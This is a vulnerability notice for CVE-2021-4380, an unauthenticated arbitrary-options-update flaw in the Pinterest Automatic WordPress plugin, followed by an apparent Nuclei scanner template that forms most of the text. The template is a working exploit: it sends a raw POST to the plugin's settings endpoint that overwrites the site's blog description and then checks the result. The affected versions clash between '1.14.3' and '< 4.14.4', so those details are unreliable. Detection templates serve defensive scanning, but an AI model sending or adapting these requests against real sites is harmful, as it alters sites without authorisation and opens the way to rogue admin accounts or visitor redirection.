The Pinterest Automatic plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on the 'wp_pinterest_automatic_parse_request' function and the 'process_form.php' script in versions up to, and including, 1.14.3. This makes it possible for unauthenticated attackers to update arbitrary options on a site that can be used to create new administrative user accounts or redirect unsuspecting site visitors.
PoC代码[已公开]
id: CVE-2021-4380
info:
name: Pinterest Automatic < 4.14.4 - Unauthenticated Arbitrary Options Update
author: s4e-io
severity: critical
description: |
The Pinterest Automatic plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on the 'wp_pinterest_automatic_parse_request' function and the 'process_form.php' script in versions up to, and including, 1.14.3. This makes it possible for unauthenticated attackers to update arbitrary options on a site that can be used to create new administrative user accounts or redirect unsuspecting site visitors.
remediation: Fixed in 4.14.4
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-4380
- https://wpscan.com/vulnerability/ffd344fd-de2c-4f27-8932-41aa0a3c3d05
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-pinterest-automatic-pin-security-bypass-4-14-3/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/e4fdc902-4cfe-4116-a294-9a0fcb2de346?source=cve
- https://github.com/20142995/nuclei-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-4380
epss-score: 0.84717
epss-percentile: 0.99286
cpe: cpe:2.3:a:valvepress:pinterest_automatic_pin:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: valvepress
product: pinterest_automatic_pin
framework: wordpress
tags: cve,cve2021,wordpress,wp,wp-plugin,wp,vkev,intrusive,pinterest-automatic-pin,vuln
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "site-description")'
condition: and
internal: true
extractors:
- type: regex
name: common-blog-description
part: body
group: 1
regex:
- '<div class="site-description">(.*?)</div>'
internal: true
- raw:
- |
POST /?wp_pinterest_automatic=settings HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
blogdescription={{common-blog-description}}!
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'len(body)==0'
condition: and
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{common-blog-description}}!")'
condition: and
# digest: 4b0a00483046022100faf7b51c61a920445c478e59cd34befb93c5b2faff6dd6b8041878ab1193192c022100886b8be604d0a6d50cee9599965c6a6f7a3090e352d5a7d15601254de4b9f5cc:922c64590222798bb761d5b6d8e72950